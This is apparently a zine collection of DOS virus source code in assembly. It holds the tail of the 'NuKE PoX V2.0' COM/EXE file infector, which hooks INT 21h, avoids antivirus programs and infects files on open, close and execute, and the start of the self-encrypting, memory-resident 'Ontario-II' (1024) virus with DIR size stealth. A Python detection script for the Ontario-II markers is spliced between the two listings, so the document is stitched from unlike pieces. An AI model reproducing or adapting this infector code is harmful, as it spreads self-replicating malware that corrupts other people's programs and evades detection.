                pop     dx                                                 
                pop     cx                                                 
                pop     bx                                                 
                pop     ax                                                 
                call    check_4_av                                         
                jc      exit1                                              
command1:       mov     ax,4300h                ;Get file Attribs          
                call    calldos21                                          
                jc      exit1                                              
                test    cl,1h                   ;Make sure there normal    
                jz      open_file               ;Okay there are            
                and     cl,0feh                 ;Nope, Fix them...         
                mov     ax,4301h                ;Save them now             
                call    calldos21                                          
                jc      exit                                               
open_file:      mov     ax,3D02h                                           
                call    calldos21                                          
exit1:          jc      exit                                               
                mov     bx,ax                   ;BX File handler           
                mov     ax,5700h                ;Get file TIME + DATE      
                Call    calldos21                                          
                mov     al,cl                                              
                or      cl,1fh                  ;Un mask Seconds           
                dec     cx                      ;60 seconds                
                xor     al,cl                   ;Is it 60 seconds?         
                jz      exit                    ;File already infected     
                push    cs                                                 
                pop     ds                                                 
                mov     word ptr ds:[old_time],cx       ;Save Time         
                mov     word ptr ds:[old_date],dx       ;Save Date         
                mov     ah,3Fh                                             
                mov     cx,1Bh                          ;Read first 1B     
                mov     dx,offset ds:[buffer]           ;into our Buffer   
                call    calldos21                                          
                jc      exit_now                        ;Error Split       
                mov     ax,4202h                        ;Move file pointer 
                xor     cx,cx                           ;to EOF File       
                xor     dx,dx                                              
                call    calldos21                                          
                jc      exit_now                        ;Error Split       
                cmp     word ptr ds:[buffer],5A4Dh      ;Is file an EXE?   
                je      exe_infect                      ;Infect EXE file   
                mov     cx,ax                                              
                sub     cx,3                            ;Set the JMP       
                mov     word ptr ds:[jump_address+1],cx                    
                call    infect_me                       ;Infect!           
                jc      exit                                               
                mov     ah,40h                          ;Write back the    
                mov     dx,offset jump_address                             
                mov     cx,3h                                              
                call    calldos21                                          
exit_now:                                                                  
                mov     cx,word ptr ds:[old_time]       ;Restore old time  
                mov     dx,word ptr ds:[old_date]       ;Restore Old date  
                mov     ax,5701h                                           
                call    calldos21                                          
                mov     ah,3Eh                                             
                call    calldos21                                          
exit:           cmp     bp,0abcdh                                          
                je      command2                                           
                pop     ds                                                 
                pop     dx                                                 
                pop     cx                                                 
                pop     bx                                                 
                pop     ax                                                 
                iret                                                       
command2:       jmp     command_ret                                        
                                                                           
exe_infect:     mov     cx,word ptr cs:[buffer+20]                         
                mov     word ptr cs:[exe_ip],cx                            
                mov     cx,word ptr cs:[buffer+22]                         
                mov     word ptr cs:[exe_cs],cx                            
                mov     cx,word ptr cs:[buffer+16]                         
                mov     word ptr cs:[exe_sp],cx                            
                mov     cx,word ptr cs:[buffer+14]                         
                mov     word ptr cs:[exe_ss],cx                            
                push    ax                                                 
                push    dx                                                 
                call    multiply                                           
                sub     dx,word ptr cs:[buffer+8]                          
                mov     word ptr cs:[vir_cs],dx                            
                push    ax                                                 
                push    dx                                                 
                call    infect_me                                          
                pop     dx                                                 
                pop     ax                                                 
                mov     word ptr cs:[buffer+22],dx                         
                mov     word ptr cs:[buffer+20],ax                         
                pop     dx                                                 
                pop     ax                                                 
                jc      exit                                               
                add     ax,virus_size                                      
                adc     dx,0                                               
                push    ax                                                 
                push    dx                                                 
                call    multiply                                           
                sub     dx,word ptr cs:[buffer+8]                          
                add     ax,40h                                             
                mov     word ptr cs:[buffer+14],dx                         
                mov     word ptr cs:[buffer+16],ax                         
                pop     dx                                                 
                pop     ax                                                 
                push    bx                                                 
                push    cx                                                 
                mov     cl,7                                               
                shl     dx,cl                                              
                mov     bx,ax                                              
                mov     cl,9                                               
                shr     bx,cl                                              
                add     dx,bx                                              
                and     ax,1FFh                                            
                jz      outta_here                                         
                inc     dx                                                 
outta_here:     pop     cx                                                 
                pop     bx                                                 
                mov     word ptr cs:[buffer+2],ax                          
                mov     word ptr cs:[buffer+4],dx                          
                mov     ah,40h                                             
                mov     dx,offset ds:[buffer]                              
                mov     cx,20h                                             
                call    calldos21                                          
exit_exe:       jmp     exit_now                                           
rocko           endp                                                       
vir_cs          dw      0                                                  
exe_ip          dw      0                                                  
exe_cs          dw      0                                                  
exe_sp          dw      0                                                  
exe_ss          dw      0                                                  
exe_sz          dw      0                                                  
exe_rm          dw      0                                                  
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
;                   Opening File handle AX=3D                              
;------------------------------------------------------------------------- 
opening_file:   call    check_extension                                    
                jnc     open_fuck2                                         
                call    check_exten_exe                                    
                jnc     open_fuck2                                         
                jmp     dword ptr cs:[int21]                               
open_fuck2:     push    ax                                                 
                mov     ax,3d02h                                           
                call    calldos21                                          
                jnc     open_fuck1                                         
                pop     ax                                                 
                iret                                                       
open_fuck1:     push    bx                                                 
                push    cx                                                 
                push    dx                                                 
                push    ds                                                 
                mov     bx,ax                                              
                mov     ax,5700h                                           
                call    calldos21                                          
                mov     al,cl                                              
                or      cl,1fh                                             
                dec     cx                      ;60 Seconds                
                xor     al,cl                                              
                jnz     opening_exit3                                      
                dec     cx                                                 
                mov     word ptr cs:[old_time],cx                          
                mov     word ptr cs:[old_date],dx                          
                mov     ax,4202h                ;Yes Pointer to EOF        
                xor     cx,cx                                              
                xor     dx,dx                                              
                call    calldos21                                          
                mov     cx,dx                                              
                mov     dx,ax                                              
                push    cx                                                 
                push    dx                                                 
                sub     dx,1Bh                  ;Get first 3 Bytes         
                sbb     cx,0                                               
                mov     ax,4200h                                           
                call    calldos21                                          
                push    cs                                                 
                pop     ds                                                 
                mov     ah,3fh                  ;Read them into Buffer     
                mov     cx,1Bh                                             
                mov     dx,offset buffer                                   
                call    calldos21                                          
                xor     cx,cx                   ;Goto Beginning of File    
                xor     dx,dx                                              
                mov     ax,4200h                                           
                call    calldos21                                          
                mov     ah,40h                  ;Write first three bytes   
                mov     dx,offset buffer                                   
                mov     cx,1Bh                                             
                cmp     word ptr cs:[buffer],5A4Dh                         
                je      open_exe_jmp                                       
                mov     cx,3h                                              
open_exe_jmp:   call    calldos21                                          
                pop     dx                      ;EOF - Virus_Size          
                pop     cx                      ;to get ORIGINAL File size 
                sub     dx,virus_size                                      
                sbb     cx,0                                               
                mov     ax,4200h                                           
                call    calldos21                                          
                mov     ah,40h                  ;Fix Bytes                 
                xor     cx,cx                                              
                call    calldos21                                          
                mov     cx,word ptr cs:[old_time]                          
                mov     dx,word ptr cs:[old_date]                          
                mov     ax,5701h                                           
                int     21h                                                
                mov     ah,3eh                  ;Close File                
                call    calldos21                                          
opening_exit3:  pop     ds                                                 
                pop     dx                                                 
                pop     cx                                                 
                pop     bx                                                 
                pop     ax                                                 
                jmp     dword ptr cs:[int21]                               
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
;                   Closing File Handle INFECT it!                         
;------------------------------------------------------------------------- 
closing_file:   cmp     bx,0h                                              
                je      closing_bye                                        
                cmp     bx,5h                                              
                ja      close_cont                                         
closing_bye:    jmp     dword ptr cs:[int21]                               
                                                                           
close_cont:     push    ax                                                 
                push    bx                                                 
                push    cx                                                 
                push    dx                                                 
                push    di                                                 
                push    ds                                                 
                push    es                                                 
                push    bp                                                 
                push    bx                                                 
                mov     ax,1220h                                           
                int     2fh                                                
                mov     ax,1216h                                           
                mov     bl,es:[di]                                         
                int     2fh                                                
                pop     bx                                                 
                add     di,0011h                                           
                mov     byte ptr es:[di-0fh],02h                           
                add     di,0017h                                           
                cmp     word ptr es:[di],'OC'                              
                jne     closing_next_try                                   
                cmp     byte ptr es:[di+2h],'M'                            
                jne     pre_exit                                           
                jmp     closing_cunt3                                      
closing_next_try:                                                          
                cmp     word ptr es:[di],'XE'                              
                jne     pre_exit                                           
                cmp     byte ptr es:[di+2h],'E'                            
                jne     pre_exit                                           
closing_cunt:   cmp     word ptr es:[di-8],'CS'                            
                jnz     closing_cunt1              ;SCAN                   
                cmp     word ptr es:[di-6],'NA'                            
                jz      pre_exit                                           
closing_cunt1:  cmp     word ptr es:[di-8],'-F'                            
                jnz     closing_cunt2              ;F-PROT                 
                cmp     word ptr es:[di-6],'RP'                            
                jz      pre_exit                                           
closing_cunt2:  cmp     word ptr es:[di-8],'LC'                            
                jnz     closing_cunt3                                      
                cmp     word ptr es:[di-6],'AE'    ;CLEAN                  
                jnz     closing_cunt3                                      
pre_exit:       jmp     closing_nogood                                     
closing_cunt3:  mov     ax,5700h                                           
                call    calldos21                                          
                                                                           
                mov     al,cl                                              
                or      cl,1fh                                             
                dec     cx                              ;60 Seconds        
                xor     al,cl                                              
                jz      closing_nogood                                     
                push    cs                                                 
                pop     ds                                                 
                mov     word ptr ds:[old_time],cx                          
                mov     word ptr ds:[old_date],dx                          
                mov     ax,4200h                                           
                xor     cx,cx                                              
                xor     dx,dx                                              
                call    calldos21                                          
                mov     ah,3fh                                             
                mov     cx,1Bh                                             
                mov     dx,offset buffer                                   
                call    calldos21                                          
                jc      closing_no_good                                    
                mov     ax,4202h                                           
                xor     cx,cx                                              
                xor     dx,dx                                              
                call    calldos21                                          
                jc      closing_no_good                                    
                cmp     word ptr ds:[buffer],5A4Dh                         
                je      closing_exe                                        
                mov     cx,ax                                              
                sub     cx,3h                                              
                mov     word ptr ds:[jump_address+1],cx                    
                call    infect_me                                          
                jc      closing_no_good                                    
                mov     ah,40h                                             
                mov     dx,offset jump_address                             
                mov     cx,3h                                              
                call    calldos21                                          
closing_no_good:                                                           
                mov     cx,word ptr ds:[old_time]                          
                mov     dx,word ptr ds:[old_date]                          
                mov     ax,5701h                                           
                call    calldos21                                          
closing_nogood: pop     bp                                                 
                pop     es                                                 
                pop     ds                                                 
                pop     di                                                 
                pop     dx                                                 
                pop     cx                                                 
                pop     bx                                                 
                pop     ax                                                 
                jmp     dword ptr cs:[int21]                               
closing_exe:    mov     cx,word ptr cs:[buffer+20]                         
                mov     word ptr cs:[exe_ip],cx                            
                mov     cx,word ptr cs:[buffer+22]                         
                mov     word ptr cs:[exe_cs],cx                            
                mov     cx,word ptr cs:[buffer+16]                         
                mov     word ptr cs:[exe_sp],cx                            
                mov     cx,word ptr cs:[buffer+14]                         
                mov     word ptr cs:[exe_ss],cx                            
                push    ax                                                 
                push    dx                                                 
                call    multiply                                           
                sub     dx,word ptr cs:[buffer+8]                          
                mov     word ptr cs:[vir_cs],dx                            
                push    ax                                                 
                push    dx                                                 
                call    infect_me                                          
                pop     dx                                                 
                pop     ax                                                 
                mov     word ptr cs:[buffer+22],dx                         
                mov     word ptr cs:[buffer+20],ax                         
                pop     dx                                                 
                pop     ax                                                 
                jc      closing_no_good                                    
                add     ax,virus_size                                      
                adc     dx,0                                               
                push    ax                                                 
                push    dx                                                 
                call    multiply                                           
                sub     dx,word ptr cs:[buffer+8]                          
                add     ax,40h                                             
                mov     word ptr cs:[buffer+14],dx                         
                mov     word ptr cs:[buffer+16],ax                         
                pop     dx                                                 
                pop     ax                                                 
                push    bx                                                 
                push    cx                                                 
                mov     cl,7                                               
                shl     dx,cl                                              
                mov     bx,ax                                              
                mov     cl,9                                               
                shr     bx,cl                                              
                add     dx,bx                                              
                and     ax,1FFh                                            
                jz      close_split                                        
                inc     dx                                                 
close_split:    pop     cx                                                 
                pop     bx                                                 
                mov     word ptr cs:[buffer+2],ax                          
                mov     word ptr cs:[buffer+4],dx                          
                mov     ah,40h                                             
                mov     dx,offset ds:[buffer]                              
                mov     cx,20h                                             
                call    calldos21                                          
closing_over:   jmp     closing_no_good                                    
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
;                   Infection Routine...                                   
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
infect_me       proc                                                       
                mov     ah,40h                                             
                mov     dx,offset init_virus                               
                mov     cx,virus_size                                      
                call    calldos21                                          
                jc      exit_error                      ;Error Split       
                mov     ax,4200h                                           
                xor     cx,cx                           ;Pointer back to   
                xor     dx,dx                           ;top of file       
                call    calldos21                                          
                jc      exit_error                      ;Split Dude...     
                clc                                     ;Clear carry flag  
                ret                                                        
exit_error:                                                                
                stc                                     ;Set carry flag    
                ret                                                        
infect_me       endp                                                       
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
;               DisInfection Routine for 4B                                
;------------------------------------------------------------------------- 
Disinfect       PROC                                                       
                push    ax                                                 
                push    bx                      ;Save them                 
                push    cx                                                 
                push    dx                                                 
                push    ds                                                 
                mov     ax,4300h                ;Get file Attribs          
                call    calldos21                                          
                test    cl,1h                   ;Test for Normal Attribs   
                jz      okay_dis                ;Yes, File can be opened   
                and     cl,0feh                 ;No, Set them to Normal    
                mov     ax,4301h                ;Save attribs to file      
                call    calldos21                                          
                jc      half_way                                           
okay_dis:       mov     ax,3d02h                ;File now can be opened    
                call    calldos21               ;Safely                    
                jc      half_way                                           
                mov     bx,ax                   ;Put File Handle in BX     
                mov     ax,5700h                ;Get File Time & Date      
                call    calldos21                                          
                mov     al,cl                   ;Check to see if infected  
                or      cl,1fh                  ;Unmask Seconds            
                dec     cx                      ;Test to see if 60 seconds 
                xor     al,cl                                              
                jnz     half_way                ;No, Quit File AIN'T       
                dec     cx                                                 
                mov     word ptr cs:[old_time],cx                          
                mov     word ptr cs:[old_date],dx                          
                mov     ax,4202h                ;Yes, file is infected     
                xor     cx,cx                   ;Goto the End of File      
                xor     dx,dx                                              
                call    calldos21                                          
                push    cs                                                 
                pop     ds                                                 
                mov     cx,dx                   ;Save Location into        
                mov     dx,ax                   ;CX:DX                     
                push    cx                      ;Push them for later use   
                push    dx                                                 
                sub     dx,1Bh                  ;Subtract 1Bh from the     
                sbb     cx,0                    ;End so you will find the  
                mov     ax,4200h                ;Original EXE header or    
                call    calldos21               ;First 3 bytes for COMs    
                mov     ah,3fh                  ;Read them into Buffer     
                mov     cx,1Bh                  ;Read all of the 1B bytes  
                mov     dx,offset buffer        ;Put them into our buffer  
                call    calldos21                                          
                jmp     half                                               
half_way:       jmp     end_dis                                            
half:           xor     cx,cx                   ;                          
                xor     dx,dx                   ;Goto the BEGINNING of file
                mov     ax,4200h                                           
                call    calldos21                                          
                mov     ah,40h                  ;Write first three bytes   
                mov     dx,offset buffer        ;from buffer to COM        
                mov     cx,1Bh                                             
                cmp     word ptr cs:[buffer],5A4Dh                         
                je      dis_exe_jmp                                        
                mov     cx,3h                                              
dis_exe_jmp:    call    calldos21                                          
                pop     dx                      ;Restore CX:DX, which point
                pop     cx                      ;to the End of FILE        
                sub     dx,virus_size           ;Remove Virus From the END 
                sbb     cx,0                    ;of the Original File      
                mov     ax,4200h                ;Get new EOF               
                call    calldos21                                          
                mov     ah,40h                  ;Write new EOF to File     
                xor     cx,cx                                              
                call    calldos21                                          
                mov     cx,word ptr cs:[old_time]                          
                mov     dx,word ptr cs:[old_date]                          
                mov     ax,5701h                                           
                call    calldos21                                          
                mov     ah,3eh                  ;Close File                
                call    calldos21                                          
end_dis:        pop     ds                                                 
                pop     dx                                                 
                pop     cx                      ;Restore 'em               
                pop     bx                                                 
                pop     ax                                                 
                ret                                                        
disinfect       ENDP                                                       
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
;               Check File Extension DS:DX ASCIIZ                          
;--------------------------------------------------------------------------
Check_extension         PROC                                               
                push    si                                                 
                push    cx                                                 
                mov     si,dx                                              
                mov     cx,256h                                            
loop_me:        cmp     byte ptr ds:[si],2eh                               
                je      next_ok                                            
                inc     si                                                 
                loop    loop_me                                            
next_ok:        cmp     word ptr ds:[si+1],'OC'                            
                jne     next_1                                             
                cmp     byte ptr ds:[si+3],'M'                             
                je      good_file                                          
next_1:         cmp     word ptr ds:[si+1],'oc'                            
                jne     next_2                                             
                cmp     byte ptr ds:[si+3],'m'                             
                je      good_file                                          
next_2:         pop     cx                                                 
                pop     si                                                 
                stc                                                        
                ret                                                        
good_file:      pop     cx                                                 
                pop     si                                                 
                clc                                                        
                ret                                                        
Check_extension         ENDP                                               
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
;               Check File Extension DS:DX ASCIIZ                          
;------------------------------------------------------------------------- 
Check_exten_exe         PROC                                               
                push    si                                                 
                push    cx                                                 
                mov     si,dx                                              
                mov     cx,256h                                            
loop_me_exe:    cmp     byte ptr ds:[si],2eh                               
                je      next_ok_exe                                        
                inc     si                                                 
                loop    loop_me_exe                                        
next_ok_exe:    cmp     word ptr ds:[si+1],'XE'                            
                jne     next_1_exe                                         
                cmp     byte ptr ds:[si+3],'E'                             
                je      good_file_exe                                      
next_1_exe:     cmp     word ptr ds:[si+1],'xe'                            
                jne     next_2_exe                                         
                cmp     byte ptr ds:[si+3],'e'                             
                je      good_file_exe                                      
next_2_exe:     pop     cx                                                 
                pop     si                                                 
                stc                                                        
                ret                                                        
good_file_exe:  pop     cx                                                 
                pop     si                                                 
                clc                                                        
                ret                                                        
Check_exten_exe         ENDP                                               
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
;                    Call Int_21h Okay                                     
;------------------------------------------------------------------------- 
calldos21        PROC                                                      
                pushf                                                      
                call    dword ptr cs:[int21]                               
                retn                                                       
calldos21        ENDP                                                      
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
;                    MultiPly                                              
;--------------------------------------------------------------------------
multiply         PROC                                                      
                push    bx                                                 
                push    cx                                                 
                mov     cl,0Ch                                             
                shl     dx,cl                                              
                xchg    bx,ax                                              
                mov     cl,4                                               
                shr     bx,cl                                              
                and     ax,0Fh                                             
                add     dx,bx                                              
                pop     cx                                                 
                pop     bx                                                 
                retn                                                       
multiply         ENDP                                                      
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- 
;               Check for AV file... Like SCAN.EXE or F-PROT.EXE           
;------------------------------------------------------------------------- 
Check_4_av              PROC                                               
                push    si                                                 
                push    cx                                                 
                mov     si,dx                                              
                mov     cx,256h                                            
av:             cmp     byte ptr ds:[si],2eh                               
                je      av1                                                
                inc     si                                                 
                loop    av                                                 
av1:            cmp     word ptr ds:[si-2],'NA'                            
                jnz     av2                                                
                cmp     word ptr ds:[si-4],'CS'                            
                jz      fuck_av                                            
av2:            cmp     word ptr ds:[si-2],'NA'                            
                jnz     av3                                                
                cmp     word ptr ds:[si-4],'EL'                            
                jz      fuck_av                                            
av3:            cmp     word ptr ds:[si-2],'TO'                            
                jnz     not_av                                             
                cmp     word ptr ds:[si-4],'RP'                            
                jz      fuck_av                                            
not_av:         pop     cx                                                 
                pop     si                                                 
                clc                                                        
                ret                                                        
fuck_av:        pop     cx                                                 
                pop     si                                                 
                stc                                                        
                ret                                                        
Check_4_av              ENDP                                               
msg             db      "NuKE PoX V2.0 - Rock Steady"                      
old_time        dw      0                                                  
old_date        dw      0                                                  
file_handle     dw      0                                                  
jump_address    db      0E9h,90h,90h                                       
buffer          db      90h,0CDh,020h           ;\                         
                db      18h DUP (00)            ;-Make 1Bh Bytes           
last:                                                                      
seg_a           ends                                                       
          end  start                                                       
;==========================================================================
;========================================================================= 
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 
; 1024-SRC Virus (Ontario-II) by Death Angel                               
; ========                                                                 
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 
;                                                                          
;This VIRUS was only written as an experiment to see how far a computer    
;virus could go through development. This particular virus in its present
;form WILL NOT do any damage to your data or go off bouncing a ball across
;your screen or play Yankee Doodle, IT WILL ONLY infect programs.
;                                                                          
; Virus Information:                                                       
;    Hides:   In upper RAM, requires 3K of memory.                         
;     Size:   1K (exactly when attached to either EXE or COM files)        
;       ID:   Seconds in date of file is set to 32 (impossible value)      
;             .COM files, the 4th byte is 'O'                              
;             .EXE files, the stack pointer is 0600h                       
;                                                                          
; Cover-Up:   If loaded with DEBUG, it will remove itself from memory.     
;             When doing a DIR, it will cover up the filesize increase.    
;                                                                          
;Notes:   Also infects on a file open if the file ends in COM,EXE or OVL   
;                                                                          
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 
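The markers named in the header comment above, turned into a triage check (an added example, not part of the zine's listing). It assumes raw 32-byte FAT directory entries read from a disk image, uses the seconds-field value the listing's DIR handler tests (And Al,1Fh / Cmp Al,1Fh), and all function names and sample bytes are constructed for illustration.

```python
import struct

VIRUS_SIZE = 1024            # "Size: 1K", per the listing's header comment
MARKER_SECONDS_FIELD = 0x1F  # value the DIR handler tests: And Al,1Fh / Cmp Al,1Fh
EXE_MARKER_SP = 0x0600       # initial SP, per the listing's header comment
ATTR_VOLUME, ATTR_DIRECTORY = 0x08, 0x10


def timestamp_marked(dos_time: int) -> bool:
    """DOS stores seconds/2 in the low 5 bits of the time word; valid is 0..29."""
    return (dos_time & 0x1F) == MARKER_SECONDS_FIELD


def scan_directory(raw: bytes) -> list:
    """Walk raw 32-byte FAT directory entries and report files carrying the marker."""
    findings = []
    for off in range(0, len(raw) - 31, 32):
        entry = raw[off:off + 32]
        if entry[0] == 0x00:      # end-of-directory sentinel
            break
        if entry[0] == 0xE5:      # deleted entry
            continue
        if entry[11] & (ATTR_VOLUME | ATTR_DIRECTORY):
            continue              # labels and subdirectories (also long-name entries)
        dos_time, = struct.unpack_from("<H", entry, 0x16)
        size, = struct.unpack_from("<I", entry, 0x1C)
        if not timestamp_marked(dos_time):
            continue
        name = entry[0:8].decode("ascii", "replace").rstrip()
        ext = entry[8:11].decode("ascii", "replace").rstrip()
        findings.append({
            "name": f"{name}.{ext}" if ext else name,
            "size_on_disk": size,
            # What a DIR would report while the size cover-up is active.
            "size_under_stealth": size - VIRUS_SIZE if size >= VIRUS_SIZE else None,
        })
    return findings


def content_markers(data: bytes) -> list:
    """Check file contents for the COM and EXE markers the listing documents."""
    hits = []
    if data[:2] in (b"MZ", b"ZM"):
        # Initial SP lives at offset 10h of the EXE header.
        if len(data) >= 0x12 and struct.unpack_from("<H", data, 0x10)[0] == EXE_MARKER_SP:
            hits.append("exe-initial-sp")
    elif len(data) >= 4 and data[0] == 0xE9 and data[3] == ord("O"):
        # Near JMP at offset 0 followed by 'O' as the 4th byte.
        hits.append("com-jmp-marker")
    return hits


def make_entry(name: str, ext: str, dos_time: int, size: int, attr: int = 0x20) -> bytes:
    """Build a constructed directory entry for the sample data below."""
    head = name.ljust(8).encode("ascii") + ext.ljust(3).encode("ascii") + bytes([attr])
    # 0x1A6D encodes the date 1993-03-13; start cluster 2 is arbitrary.
    return head + bytes(10) + struct.pack("<HHHI", dos_time, 0x1A6D, 2, size)


# Constructed sample data: one clean file, one marked file, one deleted marked entry.
CLEAN_TIME = (12 << 11) | (30 << 5) | 10    # 12:30:20
MARKED_TIME = (12 << 11) | (30 << 5) | 31   # seconds field 31, i.e. "62 seconds"
SAMPLE_DIR = (
    make_entry("EDIT", "COM", CLEAN_TIME, 4096)
    + make_entry("GAME", "COM", MARKED_TIME, 5120)
    + b"\xE5" + make_entry("OLD", "EXE", MARKED_TIME, 9000)[1:]
)
SAMPLE_COM = b"\xE9\x00\x10O" + bytes(16)
SAMPLE_EXE = b"MZ" + bytes(14) + struct.pack("<H", EXE_MARKER_SP) + bytes(10)

if __name__ == "__main__":
    for finding in scan_directory(SAMPLE_DIR):
        print(finding)
    print(content_markers(SAMPLE_COM), content_markers(SAMPLE_EXE))
```

Run this against a raw image or from a clean boot: the listing's DIR cover-up only alters what a resident copy reports, so the on-disk directory entry still holds the true size and the marked timestamp.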
                                                                           
Stack_Size      Equ     512+1                                              
                                                                           
Code    Segment Para    Public  'CODE'                                     
        Assume  Cs:Code, Ds:Code                                           
        Org     0000h                                                      
                                                                           
Jmpfar  Macro   addr                                                       
        db      0EAh                                                       
        dd      addr                                                       
Endm                                                                       
                                                                           
Callfar Macro   addr                                                       
        db      09Ah                                                       
        dd      addr                                                       
Endm                                                                       
                                                                           
Retfar  Macro   num                                                        
        db      0CAh                                                       
        dw      num                                                        
Endm                                                                       
                                                                           
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 
; Do a loop to decode the rest of the virus.                               
                                                                           
Virus_Begin:                                                               
                                                                           
V00:    Mov     Bx, offset V05-V05_Back                                    
V04:    Mov     Cx, offset Start_Code-(offset V05-V05_Back)                
V01:    Mov     Al, 00h                                                    
V02:    Add     Byte ptr Cs:[Bx], Al                                       
V03:    Xor     Al, 00h                                                    
        Inc     Bx                                                         
        Loop    V02                                                        
                                                                           
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 
V05_Back        Equ     0                                                  
                                                                           
V05:    Sub     Bx, offset Start_Code                                      
        Xchg    Ax, Cx                                                     
        Dec     Ax                                                         
        Int     21h                                                        
        Or      Al, Ah                                                     
        Je      Run_Prog                                                   
        Push    Ds                                                         
        Xor     Di, Di                                                     
        Mov     Ds, Di                                                     
        Lds     Ax, Dword ptr Ds:[21h*4]                                   
        Mov     Word ptr Cs:[Bx].Saved_21, Ax                              
        Mov     Word ptr Cs:[Bx].Saved_21+2, Ds                            
        Mov     Cx, Es                                                     
        Dec     Cx                                                         
        Mov     Ds, Cx                                                     
        Sub     Word ptr Ds:[Di+03h], 3072/16                              
        Mov     Ax, Word ptr Ds:[Di+12h]                                   
        Sub     Ax, 3072/16                                                
        Mov     Word ptr Ds:[Di+12h], Ax                                   
        Mov     Es, Ax                                                     
        Sub     Ax, 1000h                                                  
        Mov     Word ptr Cs:[Bx+Dos_Seg-2], Ax                             
        Push    Cs                                                         
        Pop     Ds                                                         
        Mov     Si, Bx                                                     
        Mov     Cx, offset Start_Code                                      
        Cld                                                                
        Rep     Movsb                                                      
        Mov     Ds, Cx                                                     
        Cli                                                                
        Mov     Word ptr Ds:[21h*4], offset New_21                         
        Mov     Word ptr Ds:[21H*4]+2, Es                                  
        Sti                                                                
        Mov     Ax, 4BFFh                                                  
        Push    Bx                                                         
        Int     21h                                                        
        Pop     Bx                                                         
        Pop     Ds                                                         
        Push    Ds                                                         
        Pop     Es                                                         
                                                                           
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 
                                                                           
Run_Prog:                                                                  
        Lea     Si, [Bx].Start_Code                                        
        Mov     Di, 0100h                                                  
        Cmp     Bx, Di                                                     
        Jb      Run_Exe                                                    
                                                                           
Run_COM:                                                                   
        Push    Di                                                         
        Movsw                                                              
        Movsw                                                              
        Ret                                                                
                                                                           
Run_EXE:                                                                   
        Mov     Ax, Es                                                     
        Add     Ax, 0010h                                                  
        Add     Word ptr Cs:[Si+02], Ax                                    
        Add     Word ptr Cs:[Si+04], Ax                                    
        Cli                                                                
        Mov     Sp, Word ptr Cs:[Si+06]                                    
        Mov     Ss, Word ptr Cs:[Si+04]                                    
        Sti                                                                
        Jmp     Dword ptr Cs:[Si+00]                                       
                                                                           
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 
                                                                           
Check_Present:                                                             
        Inc     Ax                                                         
        Iret                                                               
                                                                           
New_21: Cmp     Ax, 0FFFFh              ; Checking if resident ?           
        Je      Check_Present                                              
        Cmp     Ah, 4Bh                 ; Executing a program ?            
        Je      Load_Program                                               
        Cmp     Ah, 11h                 ; Doing a DIR ?                    
        Je      Find_First                                                 
        Cmp     Ah, 12h                 ; Doing a DIR ?                    
        Je      Find_Next                                                  
        Cmp     Ax, 3D00h               ; Opening a file ?                 
        Jne     Run_21                                                     
        Call    Open_File                                                  
Run_21:                                                                    
        Jmpfar  0                       ; Goto vector 21h                  
Saved_21        Equ     $-4                                                
                                                                           
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 
                                                                           
Find_First:                                                                
Find_Next:                                                                 
        Push    Bp                                                         
        Mov     Bp, Sp                                                     
        Cmp     Word ptr [Bp+04], 1234h                                    
Dos_Seg:                                                                   
        Pop     Bp                                                         
        Jb      Run_21                                                     
        Call    Do_21                                                      
        Call    Save_Regs                                                  
        Mov     Ah, 2Fh                                                    
        Call    Do_21                                                      
        Cmp     Byte ptr Es:[Bx], 0FFh                                     
        Je      F20                                                        
        Sub     Bx, +7                                                     
F20:    Mov     Al, Byte ptr Es:[Bx].1Eh                                   
        And     Al, 1Fh                                                    
        Cmp     Al, 1Fh                                                    
        Jne     F00                                                        
        Mov     Dx, Word ptr Es:[Bx].26h                                   
        Mov     Ax, Word ptr Es:[Bx].24h                                   
        Sub     Ax, offset Virus_End                                       
        Sbb     Dx, +00                                                    
        Or      Dx, Dx                                                     
        Jb      F00                                                        
        Mov     Word ptr Es:[Bx].26h, Dx                                   
        Mov     Word ptr Es:[Bx].24h, Ax                                   
F00:    Call    Restore_Regs                                               
        IRet                                                               
                                                                           
